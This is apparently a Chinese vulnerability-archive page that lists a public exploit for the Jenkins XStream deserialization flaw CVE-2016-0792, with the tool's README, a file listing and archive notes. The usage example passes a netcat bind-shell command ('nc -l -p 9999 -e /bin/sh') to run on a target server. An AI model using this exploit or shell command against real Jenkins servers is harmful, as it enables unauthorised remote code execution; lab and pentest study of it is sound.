关联漏洞
标题:
CloudBees Jenkins CI和LTS 任意代码执行漏洞
(CVE-2016-0792)
描述:CloudBees Jenkins是美国CloudBees公司的一款基于Java开发的开源的、可持续集成的自动化服务器,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS(Long-Term Support)是CloudBees Jenkins的一个长期支持版本。 CloudBees Jenkins CI 1.650之前版本和LTS 1.642.2之前版本的API端点存在安全。远程攻击者可借助XML文件中的序列化数据利用该漏洞执行任意代码。
描述
Exploit for Jenkins serialization vulnerability - CVE-2016-0792
介绍
# Jenkins CVE-2016-0792
## Exploit for Jenkins serialization vulnerability - CVE-2016-0792
#### Exploit database
[https://www.exploit-db.com/exploits/42394/](https://www.exploit-db.com/exploits/42394/)
#### More information can be found here
1. [Contrast Security](https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream)
2. [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)
#### Requirements
1. Python 3.6.x
2. [requests](http://docs.python-requests.org/en/master/) library is required for this exploit to work
`sudo pip install requests`
#### Usage
`python3`
`from exploit import exploit`
`exploit(url, command)`
Where url is url to jenkins server and command is command to execute
##### Example
`exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')`
This will run nc and listen on port 9999 on vulnerable machine
For demonstration purposes I will be running ISO from [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)
[](https://asciinema.org/a/131436)
#### Disclaimer
Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using
this software against the law.
文件快照
[4.0K] /data/pocs/306c811dc3d0ee4315ceec42643108888cc965dc
├── [2.8K] exploit.py
├── [1.0K] LICENSE
├── [ 914] prepare_payload.py
└── [1.3K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。